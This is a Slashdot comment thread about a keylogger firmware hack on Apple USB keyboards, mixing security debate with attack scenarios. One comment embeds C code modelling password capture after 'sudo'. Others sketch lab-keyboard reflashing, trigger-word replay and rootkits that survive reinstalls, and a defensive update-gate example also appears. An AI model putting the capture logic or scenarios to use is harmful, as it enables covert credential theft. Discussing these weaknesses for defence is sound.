      If it has to have a flash BIOS for some reason, why does the flashing utility allow any image to go in without notice? Something like this should either require a signed or encrypted image that the flash utility decodes and decides is correct before putting it in. Maybe something simple as holding a distinct key sequence down on the keyboard while the utility pops up might be an alternative. This way at least the user has to be duped into knowingly flashing the keyboard, as opposed to a completely stealth compromise.

      If I were making a keyboard with a flashable BIOS, rather than going the easy route and hiding a symmetric key on the chip, which would eventually be discovered, I'd use a SHA256 hash combined with an elliptic signing key to validate that a BIOS image was not tampered with before allowing it to be copied to the device. Yes, (barring someone breaking the public key crypto or obtaining the private key) someone could hack a particular keyboard to accept any flash image, but it would require physical access to the JTAG contacts on the device, and it's well known that the game is over when an attacker obtains physical access to a machine anyway.

    7. Re:Flash memory in a keyboard? by confidential · · Score: 5, Informative

      The firmware could have been in ROM, but these days Flash is about as cheap as ROM and gives you the option of distributing fixes if you find bugs after the device ships.

      Two such examples of exactly that:

      1. Aluminum Keyboard Firmware Update (desktops)
      2. MacBook, MacBook Pro Keyboard Firmware Update (portables)

      The only news here is that the same mechanism of installing these updates is able to have other third party software installed in their place as well.

    8. Re:Flash memory in a keyboard? by TheRaven64 · · Score: 1

      Asking a question that another poster answered two posts up and five minutes earlier is a good way to get a -1 redundant moderation.

      --
      I am TheRaven on Soylent News
    9. Re:Flash memory in a keyboard? by mysidia · · Score: 1

      Such a switch would cost money. But it's a fricken keyboard, it's got lots of buttons.

      Seems like there could be a special sequence of keys you have to press and hold for 30 seconds before the existing firmware would accept the request to initiate an update.

    10. Re:Flash memory in a keyboard? by mysidia · · Score: 1

      Maybe in future versions of MacOS there will be new keyboard features, or a simpler/different keyboard communications protocol, and a firmware update will allow you to keep using your existing KB, instead of throwing it away and buying a brand new next-edition KB?

    11. Re:Flash memory in a keyboard? by ColdWetDog · · Score: 4, Funny

      Yeah, he should wait 24 hours and repost the whole article. That works way better around here.

      --
      Faster! Faster! Faster would be better!
    12. Re:Flash memory in a keyboard? by Plunky · · Score: 1

      It's a USB keyboard. That means that it communicates with the host via quite a complex protocol.

      I wonder how different the Bluetooth keyboards are? I have an older one and I've never heard about this HIDFirmwareUpdaterTool, be interesting to see if I could hack my Bluetooth keyboard..

      (I'm not likely to be vulnerable to a remote attack with this as I use a different OS and to my certain knowledge there is no way to initiate a firmware update from the host)

    13. Re:Flash memory in a keyboard? by TheRaven64 · · Score: 3, Funny

      That only works if you call yourself an 'editor'.

      --
      I am TheRaven on Soylent News
    14. Re:Flash memory in a keyboard? by TheRaven64 · · Score: 1

      Bluetooth is even more complicated, so I wouldn't be surprised if there's more RAM and flash in your keyboard. Not sure how the updates are handled, but they may be something simple like using the Bluetooth serial profile, in which case you'd be vulnerable to attack via any OS (although the attacker would have to already have root access). This attack is only really useful if you want to preserve a compromise past a reinstall. You'd probably get the keyboard to recognise the sequence "root\n" and "su\n" and then log the next dozen or so keystrokes, so you'd have the root password. Alternatively do the same thing with sudo, then you may get the password of a user in the sudoers file - if ssh is enabled you can then use this to get remote access. Convenient if you have physical access a few times for short periods (just long enough to install the firmware and then retrieve the password).

      --
      I am TheRaven on Soylent News
    15. Re:Flash memory in a keyboard? by ironicsky · · Score: 2, Interesting

      Most likely because they never anticipated anyone being bored enough to reverse engineer something as simple as a keyboard to hack it. It's like reverse engineering your old school ball mouse.

      Some people just have a lot of time on their hands

    16. Re:Flash memory in a keyboard? by ps60k · · Score: 1

      In addition to being a USB keyboard, it also acts as a USB hub. All Apple USB keyboards have at least two built-in USB ports for mice, etc. I would imagine it requires a little more "logic" than a typical USB keyboard.

    17. Re:Flash memory in a keyboard? by Anonymous Coward · · Score: 0

      Your Logitech G15 is a USB keyboard that also acts as a hub, has programmable macro keys that don't go through the OS and evidently has upgradeable firmware and you'd be surprised if it had flash/EPROM? Most gaming mice have upgradeable firmware!

      Christ, learn WTF you're talking about before you flap your jaw.

    18. Re:Flash memory in a keyboard? by dgatwood · · Score: 1

      It depends on how the keyboard is matrixed, I suppose, but you have to have more than three-key handling or you wouldn't be able to detect people holding down the four or five modifier keys and pressing a key... not to mention that you'd have certain combinations of single modifiers with single keys that couldn't be detected at all.... :-)

      With any keyboard encoder, you should be able to get at least 8 buttons or so even without any sharing or reprogramming. If you matrix the joystick in an interesting way to rule out absurd combinations (you can't push the stick up and down at the same time, for example), you can probably go even higher. How many controls do you need?

      --

      Check out my sci-fi/humor trilogy at PatriotsBooks.

    19. Re:Flash memory in a keyboard? by Anonymous Coward · · Score: 0

      One computer I used to use had a HD6301V1 microcontroller in the keyboard. 4kB ROM, 128 bytes RAM, etc. - specs vaguely comparable to this Apple keyboard.

      The computer? A SODDING ATARI ST FROM 1986. Microcontrollers in keyboards aren't new, and I suspect the main reason it didn't have flash memory instead of a ROM was because flash wasn't even commercially available back then.

      (I seem to recall one virus checker peering at the keyboard's RAM, in the off-chance that something unwanted was lurking in there. There is nothing new under the sun...)

    20. Re:Flash memory in a keyboard? by jpmorgan · · Score: 1

      And your keyboard would cost $200...

    21. Re:Flash memory in a keyboard? by Perf · · Score: 1

      Advantages of flash...

      Single chip solution - the microcontroller has flash built into it. The chip makers are using flash for microcontrollers because they only need to design one set of masks. FWIW, a chip rep once told me that the combination of voltage and reduced feature size means the older technologies won't work.

    22. Re:Flash memory in a keyboard? by bertoelcon · · Score: 1

      Maybe in future versions of MacOS there will be new keyboard features, or a simpler/different keyboard communications protocol, and a firmware update will allow you to keep using your existing KB, instead of throwing it away and buying a brand new next-edition KB?

      Are we thinking of the same Apple? They always want you to buy the new shiny, not upgrade the old one.

      --
      Anything can be found funny, from a certain point of view.
    23. Re:Flash memory in a keyboard? by headbulb · · Score: 1

      This hack could be done to any USB keyboard.

      A firmware flashing utility that refused to flash if the firmware image isn't from the manufacturer would be annoying. There are useful firmwares that are hacked. DVD firmware that removes regions comes to mind.

      While a BIOS is firmware, firmware is not a BIOS.

      This hack also requires physical access, which means there are other ways to compromise the system.

    24. Re:Flash memory in a keyboard? by TyFoN · · Score: 1

      Actually, Das Keyboard http://www.daskeyboard.com/ supports 12 keys to be pressed simultaneously :)

    25. Re:Flash memory in a keyboard? by unfunk · · Score: 1

      all those macros are lost once the power is turned off. The only way to save them is to enter them into the driver software in the OS. This indicated to me that any RAM onboard is not flash. I did think before I posted.

    26. Re:Flash memory in a keyboard? by Anonymous Coward · · Score: 0

      Very true. However, there are a ton of Apple keyboards with a standard method of flashing them. Other parties might have this functionality, but the time/payoff isn't as much as it would be with one of the most used brands of keyboards out today.

      Looks like the cheapest way for a company to guard this avenue of attack is to have an obvious key combination held down by the user before access to the flash utility is granted. Of course, a good Trojan would try to convince the user that they would get some DRM bypass mode if they did the key sequence + running the bongoed executable, but at least in this case, it forces it to be a PEBCAK issue as opposed to something compromised without any user knowledge.

    27. Re:Flash memory in a keyboard? by mikiN · · Score: 1

      ...and periodically sends its cachehold of data to the remnants of the Third Reich in hiding?

      /me dives

      --
      The Hacker's Guide To The Kernel: Don't panic()!
    28. Re:Flash memory in a keyboard? by mikiN · · Score: 1

      It's like reverse engineering your old school ball mouse.

      I think there must be at least one coke pusher out there who has considered that option. Anyone like to have a mouseball?

      --
      The Hacker's Guide To The Kernel: Don't panic()!
  3. What's next? by psYchotic87 · · Score: 3, Funny

    Laptop charger hack demonstrated?
    This is getting quite silly... Perhaps manufacturers should try to keep simple devices actually simple.

    1. Re:What's next? by unfunk · · Score: 3, Informative

      I feel somewhat obliged to point out that the Sony PSP is vulnerable to a battery hack. If you put in a certain battery, you can then downgrade the system's firmware and play pirated games etc

    2. Re:What's next? by MaskedSlacker · · Score: 1

      That's a feature, not a bug.

    3. Re:What's next? by oDDmON+oUT · · Score: 1

      Perhaps manufacturers should try to keep simple devices actually simple.

      When most major appliances, all automobiles, motorcycles, HDTVs, etc., etc., have at least one (if not dozens) of microprocessors and storage chips onboard, the time for that sentiment was long past in the last century.

      We've sold our souls for convenience and "ease of use" features, and are now beginning to reap the dark side of those value adds.

      --
      Some days it's just not worth
      chewing through my restraints.
    4. Re:What's next? by kerohazel · · Score: 1

      "The more they overthink the plumbing, the easier it is to stop up the drain."

      --
      Skype is too convoluted... Now I'm reverse-engineering the Kyoto Protocol.
  4. Yes, but does it run... by TheRaven64 · · Score: 3, Funny

    ...Contiki?

    --
    I am TheRaven on Soylent News
    1. Re:Yes, but does it run... by Perf · · Score: 1

      Imagine a whole raft of Contiki computers...

    2. Re:Yes, but does it run... by Anonymous Coward · · Score: 0

      +1 Genius

  5. FINALLY! by Anonymous Coward · · Score: 0

    A first port for the Mac!

  6. Coming soon to an enterprise near you by SuperKendall · · Score: 4, Funny

    Mandatory 2k long passwords to defeat possible hardware loggers.

    Changed monthly, of course.

    --
    "There is more worth loving than we have strength to love." - Brian Jay Stanley
    1. Re:Coming soon to an enterprise near you by Kozz · · Score: 1

      No problem. My company supplies me with all the post-it notes I need!

      --
      I only post comments when someone on the internet is wrong.
    2. Re:Coming soon to an enterprise near you by johncadengo · · Score: 1

      You know. I think I could actually implement that.

      Just let me cook up a firmware update for you real quick... And all you have to do is download and install it...

      --
      My page.
  7. Physical access required by pushing-robot · · Score: 3, Insightful

    Unless you also have some hidden program on the computer to flash the keyboard and later download the data (in which case you could just log the keys by software), you'd need to physically remove the keyboard, flash it with a keylogging BIOS, return the keyboard, then later retrieve the keyboard to get the logged keys.

    And, as they say, physical access is root access. There are an unlimited number of ways someone could compromise your computer if they are given access to the hardware and firmware. This hack is just further proof of that.

    Oh, and don't let anyone lend you their keyboard.

    --
    How can I believe you when you tell me what I don't want to hear?
    1. Re:Physical access required by Iphtashu+Fitz · · Score: 5, Insightful

      And, as they say, physical access is root access. There are an unlimited number of ways someone could compromise your computer if they are given access to the hardware and firmware

      Only as long as they have a fair amount of time. The beauty of this hack is that you could set up a laptop so that any keyboards that get plugged into it are immediately infected. Then you only need a few seconds alone with the target's computer to unplug the keyboard, plug it into your laptop to infect it, then plug it back into the target's computer and leave. It minimizes the risk of being caught trying to do something more extensive to the system. You just walk into an unoccupied office and walk back out 30 seconds later knowing that the keylogger is installed, as opposed to spending 30 minutes in the office trying to reboot, get into the firmware, etc.

    2. Re:Physical access required by Anonymous Coward · · Score: 5, Insightful

      Why are people always so quick to dismiss the seriousness of low level exploits?

      Consider a Mac pool at a university. You unplug the keyboard, plug it into a small box with a USB host controller that you programmed to rewrite the keyboard firmware. Plug the keyboard back in, wait until someone else logs in. Then come back, open a text editor, type your secret trigger word, watch as the keyboard spits out the logged passwords.

      Consider a remote root exploit. That enables the hacker to reflash the firmware of an attached keyboard. Then the attacker can remove all traces of the hack from the target computer. The keyboard logs passwords and waits for a trigger word. How do you make someone type a strange word? Captcha. The attacker now has your password/passphrase (SSH login to your company's web server? Your online banking PIN?) and the only trace is a modified firmware which nobody checks.

    3. Re:Physical access required by pushing-robot · · Score: 1

      I'm not dismissing the seriousness of the exploit, just pointing out that there are tons of ways to exploit a computer you have physical access to. You could swap keyboards when someone isn't looking. You could hook up one of the tinier keyloggers. Or you could attack the computer itself in any number of ways.

      The moral is: If you want to protect against knowledgeable, determined attackers, don't let them touch your PC.

      --
      How can I believe you when you tell me what I don't want to hear?
    4. Re:Physical access required by FlyingBishop · · Score: 1

      I also don't see too many good ways to stop this.

      With BIOS passwords and an alarmed lock on the case, even though someone has physical access, they're missing most of the benefits. For this, you need some sort of lock that prevents the user from unplugging the USB cable, and then you need to somehow ensure that they can't load any software to take over the keyboard.

      Seems like a really stupid problem when I'm using a 10-year-old OEM keyboard that probably cost all of $10 that has no such issues.

    5. Re:Physical access required by GrantRobertson · · Score: 1

      Then you only need a few seconds alone with the target's computer to unplug the keyboard, plug it into your laptop to infect it, then plug it back into the target's computer and leave.

      In addition, it should be relatively easy to program a PLA (programmable logic array) with a USB interface to create a small device to upload the key-logger to the keyboard. That device could be fit into a hollowed out cell phone so that no one would be the wiser. Later, that same device could be used to download the keystrokes. Who is going to notice someone sitting at a computer with a cell phone laying on the desk? The device could even be designed to download and store the logs from dozens or hundreds of keyboards. If the user had frequent enough access to the keyboards, such as in a university computer lab or library, then they could just make the rounds every once in a while and round up all kinds of passwords. Especially since the URL and password is often the only thing many people actually type on a computer used primarily for web access.

      What this means is that universities need to secure the USB connections for the keyboards so that they can not be easily unplugged. Then they need a regular procedure to go around and reset the firmware on the keyboards. Perhaps someone could write a little app that could be run on boot-up that checks the firmware for malicious code and resets it to the default every time the machine is rebooted. Perhaps this should be included in the next update from Apple.

    6. Re:Physical access required by russotto · · Score: 1

      In addition, it should be relatively easy to program a PLA (programmable logic array) with a USB interface to create a small device to upload the key-logger to the keyboard. That device could be fit into a hollowed out cell phone so that no one would be the wiser.

      No need for a "hollowed out cell phone". You could just use a real cell phone with a USB interface. Such as a jailbroken iPhone.

    7. Re:Physical access required by GrantRobertson · · Score: 1

      Of course! What was I thinking?

    8. Re:Physical access required by Anonymous Coward · · Score: 0

      Who was the moron who moderated the parent as funny?

    9. Re:Physical access required by textstring · · Score: 1

      And, as they say, physical access is root access.

      Though they rarely say that physical access is root access that persists through reformats as long as you're using the same keyboard

    10. Re:Physical access required by Anonymous Coward · · Score: 1, Insightful

      And only buy keyboards that are certified never to have been touched by human hands? I could probably infect half the Apple keyboards in the local Fry's without drawing suspicion.

    11. Re:Physical access required by Anonymous Coward · · Score: 0

      Now there's an attack... Take over a machine and make it destroy every keyboard that is attached as the admins try to get back in.

    12. Re:Physical access required by AHuxley · · Score: 1

      Let's see, young?
      Dumb?
      Work for NSA, CIA, DIA, mil intel and troll forums to muddy the water?
      Never had a sneak and peek warrant served against them?
      PC users who don't seem to understand most Apple computers ship with a KB from Apple and this would be a dreamy way in?
      Don't read the history of the clandestine services and the fun they had with hardware tech over the decades.
      The Church report did not make "them" all be good...
      Also from the Windows side, random and total penetration is a given?

      --
      Domestic spying is now "Benign Information Gathering"
    13. Re:Physical access required by complete+loony · · Score: 1

      Even quicker and simpler if you can swap the keyboard with a spare of the same model. I'd probably program it to capture the first N keys pressed after powering on. That way you should get the users login username / password.

      --
      09F91102 no, 455FE104 nope, F190A1E8 uh-uh, 7A5F8A09 that's not it, C87294CE no. Ah! 452F6E403CDF10714E41DFAA257D313F.
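
      A host-side model of the capture logic described in the comment above and in TheRaven64's earlier reply (trigger on "sudo" plus Return and keep the next dozen or so keystrokes, or keep the first N keystrokes after power-on). This is example code written for this page, not K. Chen's proof of concept and not firmware; it runs on a PC, touches no hardware and flashes nothing. The trigger string, buffer sizes, the constructed session text and all names are assumptions. What it shows is why the 256-byte RAM figure in the story is not a constraint: the whole state is 35 bytes, and nothing on the host is involved, which is the reason "scour the OS" never finds it.

```c
/* Example added for this thread: a model of trigger-word / first-N keystroke
 * capture as described in the comments. Written here for illustration; not
 * Chen's code and not firmware. Runs entirely on the host, no hardware. */
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

#define BOOT_LEN 16   /* keystrokes kept right after power-on (usually the login) */
#define CAP_LEN  16   /* keystrokes kept after the trigger (the "dozen or so") */

enum { ST_BOOT, ST_WAIT, ST_CAPTURE, ST_DONE };

typedef struct {
    uint8_t state;
    uint8_t matched;            /* bytes of TRIGGER seen so far, in order */
    uint8_t n;                  /* bytes used in buf */
    char    buf[BOOT_LEN + CAP_LEN];
} logger_t;                     /* 35 bytes: well inside a 256-byte RAM budget */

static const char TRIGGER[] = "sudo\n";   /* assumed; root/su/sudo all work the same */

void logger_init(logger_t *l) { memset(l, 0, sizeof *l); l->state = ST_BOOT; }

/* Feed one decoded keystroke ('\n' for Return). Returns 1 once capture is complete. */
int logger_feed(logger_t *l, char c)
{
    switch (l->state) {
    case ST_BOOT:               /* first keystrokes after power-on */
        l->buf[l->n++] = c;
        if (l->n == BOOT_LEN) l->state = ST_WAIT;
        break;
    case ST_WAIT:               /* scan for the trigger; a false start restarts matching */
        if (c == TRIGGER[l->matched]) {
            if (++l->matched == sizeof TRIGGER - 1) { l->matched = 0; l->state = ST_CAPTURE; }
        } else {
            l->matched = (c == TRIGGER[0]) ? 1 : 0;
        }
        break;
    case ST_CAPTURE:            /* whatever follows "sudo<Return>" is the password prompt */
        if (c == '\n' || l->n == sizeof l->buf) { l->state = ST_DONE; break; }
        l->buf[l->n++] = c;
        break;
    default:
        break;
    }
    return l->state == ST_DONE;
}

int main(void)
{
    /* Constructed session: a login, a shell command, then sudo. Not real data. */
    const char *session = "alice\nhunter2\n\nls -la\nsudo\ns3cret!\nexit\n";
    logger_t l;
    logger_init(&l);
    for (const char *p = session; *p; p++)
        if (logger_feed(&l, *p)) break;
    printf("%u bytes captured: ", (unsigned)l.n);
    for (uint8_t i = 0; i < l.n; i++) putchar(l.buf[i] == '\n' ? '|' : l.buf[i]);
    putchar('\n');              /* 23 bytes captured: alice|hunter2||ls3cret! */
    return 0;
}
```

      The defender's takeaway is the same one the thread keeps circling: nothing here ever talks to the host, so no host-side scanner sees it. Either the device refuses unauthenticated firmware, or you treat a keyboard that has left your sight the way you would treat a disk that has.
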
    14. Re:Physical access required by Torne · · Score: 1

      The point is that you can exploit the machine remotely using some software bug, and then install such an update on the user's keyboard. The exploit running on the OS will reassure the exploit running on the keyboard that everything is OK periodically. If the user discovers their computer has been compromised and reinstalls the OS from clean media, the keyboard will no longer be told that the machine is still owned, and can reinstall the exploit by, say, typing in a suitable command once the keyboard is idle for some time and thus the user hopefully isn't looking at the screen.

      Voila, a rootkit that persists even through clean OS reinstalls from trusted media!

  8. Flash needs write protect switches by Anonymous Coward · · Score: 1, Insightful

    Microcontrollers in keyboards, BIOS flash, USB sticks, SD cards: Please give us hardware write protection. Whether we want our keyboards to be just keyboards, our BIOS unmodified by root kits, USB sticks which we can insert into someone else's system without worrying that our stick gets infected, or to boot off an SD card, a simple write protect switch is the easiest and most reliable way.

    1. Re:Flash needs write protect switches by Anonymous Coward · · Score: 0

      I'd like to see this myself, where to start a BIOS flash process some type of button needs to be held down or a DIP switch flipped.

      I sort of miss the days of SCSI drives. With just one flick of a DIP switch, the entire drive was made read-only. Nothing would be able to write to it, no matter how trashed the host machine ended up, no way, no how.

      I'd use this functionality on removable drives, copying files then moving them to a FTP server and serving them from the read-only drive to ensure that the files would remain unmodified, even if the FTP server got compromised. However, those were the days before people thought of adding code to the ftp daemon to tamper with the executable as it was in flight before it got to the client.

    2. Re:Flash needs write protect switches by Grishnakh · · Score: 1

      It's too expensive. A single DIP switch might cost $0.10 in large quantities. Multiplied by a million units, that's $100k, which is a nice bonus for the CEO.

    3. Re:Flash needs write protect switches by iluvcapra · · Score: 1

      You wouldn't have to do a DIP switch, and that would be a bad solution anyways. You could have a pin on the chip that forbids writes unless it's tied to ground, thus one step in the manufacturing would be snipping the pin. Even harder-core would be a pin that blows a circuit protector when it's tied to ground, and permanently forbids writing after the connection.

      But as others have pointed out, this would ruin the ability for the vendor to ship field upgrades to keyboards.

      --
      Don't blame me, I voted for Baltar.
    4. Re:Flash needs write protect switches by Grishnakh · · Score: 1

      I don't know about other manufacturers, but I'm pretty sure the Microchip PIC microcontrollers I use, several of which have USB built-in and would be perfect for a keyboard, can only be re-flashed by an external programmer which provides a +12V programming voltage (which you don't normally supply in such a circuit, only +5V from the USB bus), and are not programmable at all over the USB bus, only certain pins on the MCU.

    5. Re:Flash needs write protect switches by arminw · · Score: 1

      ....You wouldn't have to do a DIP switch,....

      A simple way to do this would be to have an extra contact on one or two keys. In order to change anything on the chip, a user would be required to hold down that key or keys. Any time a user has to participate by holding down a key, this sort of thing is thwarted. Alternatively, Apple could modify the software update program so that any time a keyboard reprogramming must be done, certain key codes must be entered or certain combinations of keys pressed.

      --
      All theory is gray
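
      A model of the physical-presence gate suggested here and in mysidia's comment under "Flash memory in a keyboard?" (hold a key combination for 30 seconds before the firmware will accept an update). This is example code written for this page, not Apple's design and not real firmware; the chord, the timings and the function names are assumptions. The security property is in where the input comes from: the modifier byte is read from the keyboard's own switches, and a host (or malware on it) can send the device update commands but cannot press its keys, so a silent reflash from the OS is not possible while the gate is closed. A brief release, or an extra key held alongside the chord, restarts the count.

```c
/* Example added for this thread: a physical-presence gate in front of the
 * keyboard's firmware-update path, modelled on the "hold keys for 30 seconds"
 * suggestion. Host-side model written here, not Apple's design; the chord,
 * durations and names are assumptions. */
#include <stdint.h>
#include <stdbool.h>
#include <stdio.h>

#define GATE_CHORD      0x09u   /* HID modifier byte: LeftControl (0x01) | LeftGUI (0x08) */
#define GATE_HOLD_MS    30000u  /* chord must be held this long without interruption */
#define GATE_WINDOW_MS  10000u  /* an earned unlock stays valid this long */

typedef struct {
    uint32_t held_ms;      /* continuous time the exact chord has been down */
    uint32_t unlocked_ms;  /* time left on an earned unlock; 0 means locked */
} update_gate_t;

void gate_init(update_gate_t *g) { g->held_ms = 0; g->unlocked_ms = 0; }

/* Call from the key-scan loop with the current modifier byte and the time
 * since the previous call. Only the device's own switches feed this. Releasing
 * the chord, or pressing anything extra, restarts the count. */
void gate_tick(update_gate_t *g, uint8_t modifiers, uint32_t elapsed_ms)
{
    if (g->unlocked_ms > 0)
        g->unlocked_ms = (elapsed_ms >= g->unlocked_ms) ? 0 : g->unlocked_ms - elapsed_ms;

    if (modifiers == GATE_CHORD) {             /* exactly the chord, nothing else held */
        if (g->held_ms < GATE_HOLD_MS)
            g->held_ms += (elapsed_ms > GATE_HOLD_MS - g->held_ms)
                          ? GATE_HOLD_MS - g->held_ms : elapsed_ms;
        if (g->held_ms >= GATE_HOLD_MS)
            g->unlocked_ms = GATE_WINDOW_MS;   /* refreshed while still held */
    } else {
        g->held_ms = 0;
    }
}

/* The vendor-specific "enter update mode / accept image" handler asks this
 * first; an image signature check belongs after it, not instead of it. */
bool gate_allow_update(const update_gate_t *g) { return g->unlocked_ms > 0; }

int main(void)
{
    update_gate_t g;
    gate_init(&g);
    gate_tick(&g, GATE_CHORD, 29000);
    printf("after 29 s held:      %s\n", gate_allow_update(&g) ? "allowed" : "refused");
    gate_tick(&g, 0x00, 100);                  /* brief release wipes the count */
    gate_tick(&g, GATE_CHORD, 29000);
    printf("29 s after release:   %s\n", gate_allow_update(&g) ? "allowed" : "refused");
    gate_tick(&g, GATE_CHORD, 1000);
    printf("30 s continuous:      %s\n", gate_allow_update(&g) ? "allowed" : "refused");
    gate_tick(&g, 0x00, GATE_WINDOW_MS);
    printf("window expired:       %s\n", gate_allow_update(&g) ? "allowed" : "refused");
    return 0;
}
```

      The gate only answers "is a human at the keyboard consenting to this right now"; it says nothing about what image is being written. That is the job of the signature check mlts describes, and the two are complementary: the gate stops the silent remote reflash, the signature stops a duped user from installing a hostile image.
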
    6. Re:Flash needs write protect switches by metaforest · · Score: 1

      I don't know about other manufacturers, but I'm pretty sure the Microchip PIC microcontrollers I use, several of which have USB built-in and would be perfect for a keyboard, can only be re-flashed by an external programmer which provides a +12V programming voltage (which you don't normally supply in such a circuit, only +5V from the USB bus), and are not programmable at all over the USB bus, only certain pins on the MCU.

      This is untrue. Only in the oldest PIC16 MCUs was it impossible for code running on the chip to reflash the program space.

      Almost all of the PIC18 and later MCUs support direct programming of flash by the code running on the device without ANY change in voltages or signals applied to the device.

      NOW it is possible for the OEM to DISABLE the ability for code on the device to reflash, by changing the FLASH configuration bits. It might even be possible for a savvy end user to harden their keyboard in this way.

  9. Doesn't USB have DMA capability? by JanusFury · · Score: 1

    If I'm not mistaken, doesn't USB have a way for devices to access the host's memory via DMA? If so, does that mean it's possible for a 'hacked' keyboard to use DMA to write an exploit into the host machine's memory?

    --
    using namespace slashdot;
    troll::post();
    1. Re:Doesn't USB have DMA capability? by TheRaven64 · · Score: 2, Informative

      No, USB DMAs can only be initiated from the host (it's a client-server protocol, remember). A USB device has to trick the driver into starting a DMA, which is probably difficult for a keyboard to do without pretending to be some other kind of device. FireWire, on the other hand, allows one device to initiate a DMA request on another and it is up to the driver to block this.

      --
      I am TheRaven on Soylent News
    2. Re:Doesn't USB have DMA capability? by iluvcapra · · Score: 1

      No, USB DMAs can only be initiated from the host (it's a client-server protocol, remember).

      Note well, though, while we're talking about Macs, that FireWire/IEEE 1394 is non-hosted and does have DMA, so in theory someone could hand you a hacked Sony camcorder or hard drive with malicious firmware, that would then have DMA to your computer. But that's a "hardhack."

      --
      Don't blame me, I voted for Baltar.
    3. Re:Doesn't USB have DMA capability? by AHuxley · · Score: 1

      Smiles. In the old days, just fill the camcorder with a substance that ends the problem. Then you make a martyr and have a generation wanting to be as good or better.
      But if you could hand off a camcorder with media files and a hardhack, you have a way in and at anytime can 'out' the target.
      Keep the info flowing or expose them later.
      Let their own internal security stumble over and clean up for you :)
      Digital cointelpro :)

      --
      Domestic spying is now "Benign Information Gathering"
  10. Re:Too much work by Anonymous Coward · · Score: 0

    RTFA.

    Update is completely through software. You'd know this if you even glanced at the article.

  11. Makes me glad... by Iphtashu+Fitz · · Score: 1, Interesting

    ...that I don't like the Mac keyboards. I use a Mac Pro at work but the first thing I did was go out and buy a Microsoft ergonomic keyboard. Yeah, I know it's probably blasphemy to many to mix MS & Apple hardware, but I've used MS ergonomic keyboards since they practically first came out, both at home and at work, and would never go back to a regular keyboard, especially one from Apple. I've yet to see one from Apple that doesn't make my hands ache after a few hours of use.

    1. Re:Makes me glad... by Super_Z · · Score: 3, Insightful

      Why do you assume only Apple keyboards are hackable?

    2. Re:Makes me glad... by alen · · Score: 2, Informative

      probably a lot of keyboards, but Apple keyboards are probably the largest block of a single identifiable brand out there. everyone probably uses OEM'd logitechs but those are probably customized to each OEM

    3. Re:Makes me glad... by Anonymous Coward · · Score: 0

      It's blasphemy indeed. I won't contaminate my MS hardware with "shiny" Abble shit.

    4. Re:Makes me glad... by mysidia · · Score: 1

      So, er, what if there is a similar firmware hack discovered for Logitech KBs? The problem with everyone using OEM'd logitechs, or everyone using any particular KB type, is that hackability is more likely to be exploited than otherwise.

      Customized to each OEM doesn't necessarily mean incompatible firmware, or a different process for upgrading/applying firmware.

    5. Re:Makes me glad... by Anonymous Coward · · Score: 0

      Same here although I stopped using the MS keyboards a number of years ago. I can't figure out why keyboard manufacturers insist on making keyboards so damn wide. Most people do not need the keypad and if you get rid of it then you don't need to reach extra far to get to the mouse (assuming right handed here).

      I'm currently using a Kinesis Maxim but I don't like it all that much (it's too clunky/chunky and the keys are too hard to press). I keep it because it's the only "nice" split keyboard without a keypad. I like the MS keyboards a lot better though... if only they didn't have that damn keypad.

    6. Re:Makes me glad... by Anonymous Coward · · Score: 0

      Hmmm... Mixing MS and Apple hardware sounds like the time I mixed Coke and Pepsi....
      The doc says my grafts are taking quite nicely, thank you.

    7. Re:Makes me glad... by Anonymous Coward · · Score: 1, Informative

      Because Apple and a couple of Logitech keyboards are the only ones to use flash.

    8. Re:Makes me glad... by AHuxley · · Score: 1

      Someone deep in the NSA or CIA printing this and smiling, fun while it lasted :)

      --
      Domestic spying is now "Benign Information Gathering"
    9. Re:Makes me glad... by Anonymous Coward · · Score: 0

      Because he's an idiot.

  12. The Upside? by Anonymous Coward · · Score: 1, Interesting

    Anyone have any ideas for firmware modifications to add additional functionality?

    1. Re:The Upside? by Anonymous Coward · · Score: 1, Funny

      A key sequence that can be hit so it would hit the space bar every couple seconds.

      This is so I can AFK in WoW BGs without getting booted, but still get honor and marks.

    2. Re:The Upside? by mysidia · · Score: 1

      The 'fn' button is a PITA. I would like to turn it into an 'insert' button, and use the caps lock key as a fn button instead, since I never use caps lock anyways.

      One often needs Shift+Insert when RDP'ing or connecting to a remote windows machine with remote console, and an Apple keyboard has no means of sending that keystroke.

    3. Re:The Upside? by PhireN · · Score: 1

      Yeah, I like the feel of the apple keyboards, but I use Linux, and I don't like the scan code mappings.
      It shouldn't be too hard to create an alternate layout which reports the expected key codes for the F1-F12 keys, remaps Fn to Insert, F13 and F14 to Print Screen/Sys Req (So I can use the magic Sys Req key when my computer crashes) and Pause/Break.
      The remaining F15-F19 keys can be remapped for extra features.
      Then the keyboard would be fully compatible with Linux and Windows machines without the need for special drivers.

    4. Re:The Upside? by Anonymous Coward · · Score: 0

      Disable annoying CapsLock delay and remap some keys to increase compatibility with Linux/Windows.

    5. Re:The Upside? by metaforest · · Score: 1

      Yeah.

      How about a firmware mod that disables the firmware update process, or makes its use contingent on an unused GPIO pin on the MCU, eg a custom 'write protect' switch.

  13. What about other keyboard manufacturers? by ThrowAwaySociety · · Score: 3, Insightful

    Is the Apple implementation any different from what other USB HID makers use? I'd be kind of surprised if Apple did anything original with its keyboard design other than making them shiny and thin (and giving them no tactile feedback whatsoever.)

    And if so, are other USB keyboards vulnerable to similar hacks?

    1. Re:What about other keyboard manufacturers? by Doctor_Jest · · Score: 1

      I was thinking the same thing (typing on my Logitech Wave)... I would think that before this presentation, most people figured the attack vector YOUR KEYBOARD would be low if not minuscule. This is most likely a disturbing trend we're going to see more of before it's all said and done (and you know what they say, after all is said and done, a lot more is said than done.) I remember they used to attempt keyboard hacks by listening via the internal microphone, as well as using other nefarious spy-like techniques to gather your passwords. No more. No need to flutter in like Tom Cruise and attach a keylogger to the back of a connector.. now you just cause a firmware update. *facepalm* This is going to make all these thrillers seem so pedestrian. :)

      I have littlesnitch on my Macs, so in the unlikely event my keyboard is compromised (God forbid), at least I'll have a clue it's trying to squawk out of turn. :) Yes, I realize it's not perfect... but at least I'm performing my due diligence in the face of an unpatched vulnerability. :) *sigh* This is getting silly, to be honest. The KEYBOARD? Really? adjusts tinfoil hat....

      --
      It's the Stay-Puft Marshmallow Man.
    2. Re:What about other keyboard manufacturers? by Anonymous Coward · · Score: 5, Informative

      All USB keyboards are vulnerable. The blame here rests on the USB Device Firmware Update Specification, which specifies how firmware updates are supposed to work. Hint: there's no security. The only reason this makes news at all is because it has the word "Apple" in the title.

